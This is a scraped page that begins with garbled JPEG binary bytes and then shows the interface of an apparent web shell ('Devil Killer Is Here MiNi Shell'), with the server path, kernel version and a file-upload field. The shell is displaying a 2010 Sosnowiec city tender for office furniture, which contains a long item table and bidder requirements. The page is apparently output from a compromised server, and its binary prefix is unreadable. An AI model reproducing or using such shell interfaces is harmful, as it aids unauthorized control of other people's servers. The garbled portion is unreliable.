JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100212/40562-N-2010.html

<p class="kh_header"><b>Sosnowiec: Dostawa mebli biurowych w celu wyposażenia stanowisk pracy w Urzędzie Miejskim w Sosnowcu</b><br>
<b>Numer ogłoszenia: 40562 - 2010; data zamieszczenia: 12.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 032 2960600, faks (032) 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych w celu wyposażenia stanowisk pracy w Urzędzie Miejskim w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> uwaga skróty WPS,WPG,SCOP,WIM itp.- oznaczają nazwy Wydziałów Zamawiającego gdzie będzie dostarczany asortyment meblowy.

1	WPS- 301	olcha	szafa  aktowa 	3	90 szer.	40 głęb.	161 wys.		
2	WPS- 301	olcha	nadstawka na szafę 	5	90 szer.	40 głęb.	75 wys.		
3	WPS- 301	olcha	szafa aktowo-ubraniowa 	2	90 szer.	40 głęb.	161 wys.		
4	WPS- 301	olcha	biurko komputerowe z półką na klawiaturę 	5	120 szer.	60 głęb.	75 wys.		
5	WPS- 301	olcha	kontener 3- szufladowy	5	40 szer.	43 głęb.	53 wys.		
6	WPS- 301	brąz	krzesło obrotowe	5					
7	WPS- 301	brąz	krzesło drewniane wyściełane	3					
8	WPS- 301	olcha 	narożnik łukowaty z półka  10 cm od góry	2	60 szer.	60 głęb.	75 wys.		
9	WPS- 301	olcha 	szafka gospodarcza	1	80 szer.	40 głęb.	75 wys.		
10	WPS- 301	olcha	wieszak drewniany  6- ramienny stojący	1					
11	WPS- 301	olcha	kontener z drzwiczkami i z półką po środku	1	43 szer.	53 głęb.	60 wys.		
12	WPS-302	olcha	szafa aktowa	1	90 szer.	40 głęb.	161 wys.		
13	WPS-302	olcha	szafa aktowo - ubraniowa	2	90 szer.	40 głęb.	161 wys.		
14	WPS-302	olcha	nadstawka na szafę	3	90 szer.	40 głęb.	75 wys.		
15	WPS-302	olcha	biurko komputerowe z półką na klawiaturę i towerem	2	120 szer.	60 głęb.	75 wys.		
16	WPS-302	olcha	kontener 3- szufladowy	2	40 szer.	43 głęb.	53 wys.		
17	WPS-302	brąz	krzesło obrotowe	2					
18	WPS-302	brąz	krzesło drewniane wyściełane	2					
19	WPS-302	olcha 	narożnik łukowaty z półka  10 cm od góry	2	60 szer.	60 głęb.	75 wys.		
20	WPS-302	olcha 	szafka gospodarcza	1	80 szer.	40 głęb.	75 wys.		
21	WPS-310	olcha 	szafa  aktowa	2	90 szer.	40 głęb.	161 wys.		
22	WPS-310	olcha 	szafa aktowo-ubraniowa	1	90 szer.	40 głęb.	161 wys.		
23	WPS-310	olcha 	nadstawka na szafę 	3	90 szer.	40 głęb.	75 wys.		
24	WPS-310	olcha 	biurko komputerowe z półką na klawiaturę  i towerem	3	120 szer.	40 głęb.	75 wys.		
25	WPS-310	olcha 	kontener 3- szufladowy	3	40 szer.	43 głęb.	53 wys.		
26	WPS-310	brąz 	krzesło obrotowe	3					
27	WPS-310	brąz 	krzesło drewniane wyściełane	2					
28	WPS-310	olcha 	narożnik łukowaty z półka  10 cm od góry	2	60 szer.	60 głęb.	75 wys.		
29	WPS-310	olcha 	szafka gospodarcza 	1	80 szer.	40 głęb.	75 wys.		
30	WPS-328	olcha	biurko łukowe  z półką na klawiaturę i towerem	1	180 szer.
180 szer.	75 głęb.
80 głęb.	75 wys.
75 wys.		
31	WPS-328	olcha	kontener 3- szufladowy	1	40 szer.	30 głęb.	53 wys.		
32	WPS-328	olcha	stół na stelażu metalowym	1	230 szer.	70 głęb.	75 wys.		
33	WPS-328	olcha	szafa aktowa 	1	100 szer.	42 głęb.	161 wys.		
34	WPS-328	olcha	szafa aktowo-ubraniowa	1	100 szer.	42 głęb.	161 wys.		
35	WPS-328	olcha	nadstawka na szafę	2	100 szer.	42 głęb.	75 wys.		
36	WPS-328	olcha	szafka gospodarcza	1	80 szer.	40 głęb.	75 wys.		
37	WPS-328	brąz	krzesło drewniane wyściełane	10					
38	WPS-328	olcha	deska  odbojowa	1	180 szer.	35 głęb.			
39	WPS-328	brąz 	krzesło obrotowe	1					
40	WPS-328	olcha	wieszak drewniany 6-ramienny stojący	1					
41	WPS-329	olcha	biurko łukowe komputerowe  z półką na klawiaturę  i towerem 	1	150 szer.
150 szer.	60 głęb.
60 głęb.	75 wys.
75 wys.		
42	WPS-329	olcha	kontener  3 - szufladowy	3	40 szer.	43 głęb.	53 wys.		
43	WPS-329	olcha	szafka gospodarcza	1	80 szer.	42 głęb.	75 wys.		
44	WPS-329	olcha	dostawka do biurka łukowa z półką 10 cm od góry	1	60 szer.	60 głęb.	75 wys.		
45	WPS-329	olcha	szafa aktowo-ubraniowa	1	100 szer.	42 głęb.	182 wys.		
46	WPS-329	olcha	nadstawka na szafę	1	100 szer.	42 głęb.	75 wys.		
47	WPS-329	olcha	szafa aktowa	1	70 szer.	42 głęb.	182 wys.		
48	WPS-329	olcha	nadstawka do szafy aktowej	1	70 szer.	42 głęb.	75 wys.		
49	WPS-329	olcha	biurko komputerowe  z półką na klawiaturę  i towerem	1	140 szer.	60 głęb.	75 wys.		
l.p.	Pomie-szczenie	Kolor	Nazwa mebla	Ilość szt.	Wymiary cm	Cena jedno-stkowa brutto
 zł	Cena całości brutto
zł
50	WPS-329	brąz	krzesło obrotowe	2					
51	WPS-329	brąz	krzesło drewniane wyściełane	1					
52	WPS-329	olcha	nadstawka na biurko z półką w środku	1	150 szer.	30 głęb.	30 wys.		
53	WPS-329	olcha	wieszak drewniany  6 ramienny stojący	1					
54	WZO-330	wiśnia boki czarne	nadstawka na biurko bez półek	1	147 dł.	25 szer.	15 wys.		
55	WZO-330	wiśnia boki czarne	nadstawka na biurko bez półek	2	133 dł.	25 szer.	15 wys.		
56	WZO-330	wiśnia boki czarne	narożnik łukowaty z półką 12 cm od góry	4	60 szer.	60 głęb.	75 wys.		
57	WZO-330	wiśnia boki czarne	kontener -3 szufladowy	4	43 szer.	43 głęb.	53 wys.		
58	WZO-330	brąz	krzesło drewniane wyściełane	5					
59	WZO-331	wiśnia boki czarne	nadstawka na biurko bez półek	3	120 dł.	25 szer.	15 wys.		
60	WZO-331	wiśnia boki czarne	narożnik łukowaty z półką 10 cm od góry	1	70 szer.	60 głęb.	75 wys.		
61	kuchnia  327	olcha	stół na stelażu metalowym	1	160 dł.	70 szer.	75 wys.		
62	kuchnia327	olcha	krzesła drewniane taboret	6					
63	kuchnia 327	olcha	szafka wisząca  -2 drzwiowa z półką po środku	1	80 szer.	30 głęb.	72 wys.		
64	kuchnia 327	olcha	szafka gospodarcza	1	90 szer.	40 głęb.	75 wys.		
65	WPS-329 	olcha	taborety kuchenne	2					
66	WPS-329 	olcha	szafka z półkami stojąca z 2 drzwiczkami, z blatem kuchennym	1	90 szer.	52 głęb.	8 6wys.		
67	WPS-329 	olcha	szafka wisząca z suszarką	1	80 szer.	30 głęb.	72 wys.		
68	WPS-329 	olcha	szafka wisząca z półkami	1	90 szer.	30 głęb.	72 wys.		
69	WPS-329 	olcha	stolik śniadaniowy na stelażu metalowym z blatem kuchennym	1	40 dł.	60 szer.	75 wys.		
70	WPG-37	olcha	szafa aktowa	2	90 szer.	42 głęb.	161 wys.		
71	WPG-37	olcha	szafa aktowo- ubraniowa 40/60	1	100 szer.	42 głęb.	161 wys.		
72	WPG-37	olcha	nadstawka 	2	90 szer.	42 głęb.	75 wys.						
73	WPG-37	olcha	nadstawka	1	100 szer.	42 głęb.	75 wys.						
74	WPG-37	olcha	biurko komputerowe z półką na klawiaturęi towerem	1	100 szer.	60 głęb.	75 wys.						
75	WPG-37	olcha	narożnik łukowaty  z półka  10 cm od góry	1	60 szer.	60 głęb.	75 wys.						
76	WPG-37	olcha	biurko do pracy	2	120 szer.	60 głęb.	75 wys.						
77	WPG-37	olcha	szafka gospodarcza	1	100 szer.	42 głęb.	75 wys.						
78	WPG-37	olcha	stół na stelażu metalowym	1	60 szer.	70 głęb.	75 wys.						
79	WPG-37	brąz	krzesło obrotowe	3									
80	WPG-37	brąz	krzesło drewniane wyściełane	2									
81	WPG-37	olcha	kontener - 3 szufladowy	1	43 szer.	53 głęb.	60 wys.						
82	WPG-39	olcha	szafa aktowa	2	80 szer.	42 głęb.	182 wys.						
83	WPG-39	olcha	nadstawka do szafy aktowej	2	80 szer.	42 głęb.	75 wys.						
84	WPG-39	olcha	biurko komputerowe z półka  na klawiaturę	3	100 szer.	60 głęb.	75 wys.						
85	WPG-39	olcha	kontener -3 szufladowy	3	43 szer.	53 głęb.	60 wys.						
86	WPG-39	olcha	biurko do pracy	3	120 szer.	60 głęb.	75 wys.						
87	WPG-39	olcha	narożnik łukowaty z półką 10 cm od góry	6	60 szer.	60 głęb.	75 wys.						
88	WPG-39	brąz	krzesło obrotowe	3									
89	WPG-39	brąz	krzesło drewniane wyściełane	3									
90	WPG-39	olcha	szafka komoda  3 - drzwiowa	1	110 szer.	42 głęb.	135 wys.						
91	WPG-39	olcha	listwa odbojowa	1	25 szer.	200 dł.							
Załącznik Nr 2  - szczegółowy formularz oferty                                                    Prezydent Miasta Sosnowca
do postępowania przetargowego nr WAG.3410-01-0110                                               al. Zwycięstwa 20
Urząd Miejski w Sosnowcu                                                                                             41-200 Sosnowiec 

l.p.	Pomie-szczenie	Kolor	Nazwa mebla	Ilość
 szt.	Wymiary cm	Cena
 jedno-stkowa brutto
 [zł]	Cena 
Całości
 brutto
zł
92	WPG-38	olcha	szafka gospodarcza -4 drzwiowa	1	140 szer.	42 głęb.	100 wys.		
93	WPG-38	olcha	stół na stelażu metalowym	2	140 szer.	60 głęb.	75 wys.		
94	WPG-38	olcha	krzesło drewniane wyściełane	4					
95	WPG-38	olcha	biurko komputerowe z półką na klawiaturę
 i towerem	1	100 szer.	60 głęb.	75 wys.		
96	WPG-38	olcha	kontener -3 szufladowy	1	43 szer.	53 głęb.	60 wys.		
97	WPG-38	olcha	listwa odbojowa	1	25 szer.	200 dł.			
98	WPG-22	olcha	biurko komputerowe z półką na klawiaturę
 i towerem	4	140 szer.	60 głęb.	75 wys.		
99	WPG-22	olcha	kontener -3 szufladowy	8	43 szer.	53 głęb.	60 wys.		
100	WPG-22	olcha	szafa aktowa	3	90 szer.	42 głęb.	182 wys.		
101	WPG-22	olcha	nadstawka	3	90 szer.	42 głęb.	75 wys.		
102	WPG-22	olcha	szafa aktowo-ubraniowa 40/40	1	80 szer.	60 głęb.	182 wys.		
103	WPG-22	olcha	nadstawka 	1	80 szer.	60 głęb.	75 wys.		
104	WPG-22	olcha	szafka gospodarcza z zamykanymi drzwiami	2	90 szer.	42 głęb.	75 wys.		
105	WPG-22	olcha	szafka z szufladami	1	50 szer.	50 głęb.	60 wys.		
106	WPG-22	brąz	krzesło obrotowe	4					
107	WPG-22	olcha	listwa odbojowa	3	25 szer.	200 dł.			
108	WPG-22	brąz	krzesło drewniane wyściełane	2					
109	WPG-23	olcha	szafa aktowa	3	90 szer.	42 głęb.	182 wys.		
110	WPG-23	olcha	nadstawka do szafy aktowej	3	90 szer.	42 głęb.	75 wys.		
111	WPG-23	olcha	szafa aktowo - ubraniowa 4040	1	80 szer.	60 głęb.	182 wys.		
112	WPG-23	olcha	nadstawka	1	80 szer.	60 głęb.	75 wys.		
113	WPG-23	olcha	biurko komputerowe z półką na klawiaturę i towerem 	3	120 szer.	60 głęb.	75 wys.		
114	WPG-23	olcha	narożnik łukowaty z półką 10 cm od góry	5	60 szer.	60 głęb.	75 wys.		
115	WPG-23	olcha	kontener -3 szufladowy	6	43 szer.	53 głęb.	60 wys.		
116	WPG-23	olcha	biurko komputerowe z półką na klawiaturę i towerem 	2	100 szer.	60 głęb.	75 wys.		
117	WPG-23	brąz	krzesło obrotowe	3					
118	WPG-23	brąz	krzesło drewniane wyściełane	3					
119	WPG-23	olcha	słupek narożny łukowaty	1	42 szer.	42 głęb.	182 wys.		
120	WPG-23	olcha	listwa odbojowa	2	25 szer.	200 dł.			
121	SCOP	olcha	narożnik łukowaty z półką 10 cm od góry	2	70 szer.	70 głęb.	75 wys.		
122	SCOP	olcha	biurko komputerowe z półką na klawiaturę i towerem 	1	120 szer.	70 głęb.	75 wys.		
123	SCOP	olcha	kontener -3 szufladowy	1	43 szer.	53 głęb.	60 wys.		
124	SCOP	olcha	szafka gospodarcza	1	80 szer.	40 głęb.	75 wys.		
125	WiM 114	olcha	stół na stelażu metalowym	2	125 szer.	200 głęb	75 wys.		
126	WiM 114	brąz	krzesło drewniane wyściełane	30					
127	WiM 114	olcha	szafka gospodarcza	1	90 szer.	40 głęb.	75 wys.		
128	WiM 114	brąz	krzesło obrotowe	2					
129	WAG 011	olcha	szafa  aktowo - ubraniowa 50-50 . Część  ubraniowa  bez górnej półki, drążek mocowany  jak najbliżej  wiązania górnego.	
1	100 szer.	60 głęb.	161 wys.		
130	WAG 011	olcha	nadstawka do szafy	1	100 szer.	60 głęb.	75 wys.		
131	WAG 011	olcha	dostawka do biurka z półką  do regulacji	1	60 szer.	60 głęb.	75 wys.		
132	WAG 011	olcha	dostawka do biurka z półką  do regulacji	1	52 szer.	80 głęb.	75 wys.		



	
l.p.	Pomie-szczenie	Kolor	Nazwa mebla	Ilość
 szt.	Wymiary cm	Cena jedno-stkowa brutto zł
	Cena całości brutto
zł
133	WZK-402	olcha	szafa aktowa	2	90 szer.	40 głęb.	161 wys.		
134	WZK-402	olcha	nadstawka do szafy aktowej	2	90 szer.	40 głęb.	75 wys.		
135	WZK-402	olcha	szafka gospodarcza	1	90 szer.	40 głęb.	75 wys.		
136	WZK-402	olcha	biurko do pracy	2	120 szer.	60 głęb.	75 wys.		
137	WZK-402	olcha	biurko  komputerowe z półka   na klawiaturę i towerem	1					
138	WZK-402	olcha	narożnik łukowaty z półką 10 cm od góry	3	60 szer.	60 głęb.	75 wys.		
139	WZK-402	brąz	krzesło obrotowe	3					
140	WZK-402	olcha	wieszak drewniany-6 ramienny stojący	1					
141	WZK-402	olcha	kontener -3 szufladowy	1	43 szer.	53 głęb.	60 wys.		
142	WZK-402	olcha	półka wysuwana pod klawiaturę	1	60 dł.	40 szer.			
143	WZK-402	brąz	krzesło drewniane wyściełane	2					
144	WZK-406	olcha	szafa aktowa	1	90 szer.	40 głęb.	161 wys.		
145	WZK-406	olcha	nadstawka do szafy aktowej	1	90 szer.	40 głęb.	75 wys.		
146	WZK-406	olcha	szafka gospodarcza	1	90 szer.	40 głęb.	75 wys.		
147	WZK-406	olcha	biurko do pracy	1	120 szer.	60 głęb.	75 wys.		
148	WZK-406	olcha	biurko komputerowe z półką na klawiaturę i towerem	1	120 szer.	60 głęb.	75 wys.		
149	WZK-406	olcha	narożnik łukowaty  z półką 10 cm  od góry	1	60 szer.	60 głęb.	75 wys.		
150	WZK-406	olcha	kontener 3- szufladowy	2	43 szer.	53 głęb.	60 wys.		
151	WZK-406	brąz	krzesło obrotowe	2					
152	WZK-406	olcha	wieszak drewniany -6 ramienny stojący	1					
153	WZK-406	olcha	stół na stelażu metalowym	1	150 szer.	75 wys.	75 wys.		
154	WZK-406	brąz	krzesło drewniane wyściełane	6					
155	WZK-406	olcha	deski odbojowe	2	200 dł.	30 szer.			
156	WZK-406	olcha	półka wysuwana pod klawiaturę komputerową	1	60 dł.	40 szer.			
157	WFN-109	olcha	szafa aktowa	4	90 szer.	40 głęb.	217 wys.		
158	WFN-109	olcha	nadstawka  do szafy aktowej	4	90 szer.	40 głęb.	73 wys.		
159	WFN-109	olcha	szafa aktowa	2	80 szer.	40 głęb.	217 wys.		
160	WFN-109	olcha	nadstawka do szafy aktowej	2	80 szer.	40 głęb.	73 wys.		
161	WFN-109	olcha	szafa aktowa	1	67 szer.	40 głęb.	217 wys.		
162	WFN-109	olcha	nadstawka	1	67 szer.	40 głęb.	75 wys.		
163	WFN-109	olcha	szafa ubraniowa	1	70 szer.	57 głęb.	217 wys.		
164	WFN-109	olcha	nadstawka	1	70 szer.	57 głęb.	73 wys.		
165	WFN-109	brąz	krzesło obrotowe	4					
166	WGK-305B	calwados	 stół na stelażu metalowym z blatem typu sandwich-45 mm o zaokrąglonych rogach	1	120 dł.	80 szer.	77 wys.		
167	WAG	olcha	biurko komputerowe z półką na klawiaturę i towerem	10	120 dł.	60 szer.	75 wys.		
168	WAG	olcha	kontener  - 3 szufladowy	15	43 szer.	53 głęb.	60 wys.		
169	WAG	olcha	półki wysuwane pod klawiaturę komputerową	15	60 szer.	40 głęb.			
170	WAG	olcha	biurko do pracy	10	120 szer.	60 głęb.	75 wys.		
171	WAG	olcha	szafa aktowa	10	90 szer.	40 głęb.	161 wys.		
172	WAG	olcha	nadstawka do szafy aktowej	10	90 szer.	40 głęb.	75 wys.		
173	WAG	olcha	narożnik łukowaty z półką 10 cm  od góry
-lewe	5	60 szer.	dł.60.	75 wys.		
174	WAG	olcha	narożniki łukowate z półką  10 cm od góry -prawe	5	60 szer.	dł.60.	75 wys.		
l.p.	
Pomie-
szczenie	
kolor	Nazwa mebla	Ilość
 [szt.]	Wymiary [cm]	Cena
jedno-
stkowa
 brutto
 [zł]	Cena
 całości
 brutto
[zł]
175	WAG	olcha	szafka gospodarcza -2 drzwi półka w środku, zamykana	5	80 szer.	40 gł.	75 wys.		
176	WAG	olcha	kontener otwierany -1 drzwiowy z półka po środku	5	43 szer.	53 głęb.	60 wys.		
177	WAG	olcha	wieszak drewniany -6 ramienny stojący	5					
178	WAG	brąz	krzesło drewniane wyściełane	15						
179	WAG	brąz	krzesło obrotowe	15					
180	WGG	olcha 	szafa aktowa	3	90 szer.	40 głęb.	217 wys.		
181	WGG	olcha 	nadstawka do szafy aktowej	3	90 szer.	40 głęb.	73 wys.		
182	WGG	olcha	półka wisząca otwarta z półką po środku	1	80 szer.	40 głęb.	80 wys.		
183	WAG 208 B	orzech	gablota do przechowywania sztandaru Miasta Sosnowca, dwudrzwiowa ,oszklona wyposażona w uchwyty do zawieszania na ścianie oraz uchwyty do zawieszania sztandaru. Powinna ona mieć  drzwi szklane  na zawiasach, 
w ramce drewnianej, metalowe uchwyty do otwierania  wraz z zamkami do zamykania w dolnej części.	1	165 szer.	15 głęb.	130 wys..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W celu potwierdzenia posiadania uprawnień do wykonywania działalności w zakresie dostawy obejmującej przedmiot zamówienia, należy załączyć oświadczenie 
w trybie art. 22 ust 1 pkt 1, 2, 3,4 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233 §1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.W celu potwierdzenia spełnienia warunku posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć :
- wykaz co najmniej trzech dostaw obejmujących dostawę mebli, stołów lub krzeseł, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,- złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2a W celu potwierdzenia spełnienia warunku  dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć :
- wykaz co najmniej trzech dostaw obejmujących dostawę mebli, stołów lub krzeseł, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,- złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy 
w dokumentach w celu uzyskania zamówienia publicznego.
3. Dokumenty potwierdzające, że dostawy te w okresie ostatnich trzech lat (licząc wstecz od terminu składania ofert, a jeżeli okres prowadzenia działalności był krótszy to tylko 
z tego okresu) zostały wykonane należycie.( np.: listy referencyjne lub inne ).
4.W celu potwierdzenia spełniania warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia należy załączyć oświadczenie w trybie art. 22 ust 1 pkt 1, 2, 3 ustawy Prawo zamówień publicznych (załącznik nr 3 do SIWZ) złożone pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy w dokumentach w celu uzyskania zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5 W celu potwierdzenia spełnienia warunku  dysponowania osobami zdolnymi do wykonania zamówienia w zakresie objętym postępowaniem należy przedłożyć :
- wykaz co najmniej trzech dostaw obejmujących dostawę mebli, stołów lub krzeseł, 
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,- złożony pod rygorem odpowiedzialności karnej za fałszywe zeznania zgodnie z art. 233§1 Kodeksu karnego oraz art. 297 § 1 Kodeksu karnego - odpowiedzialność za poświadczenie nieprawdy 
w dokumentach w celu uzyskania zamówienia publicznego.
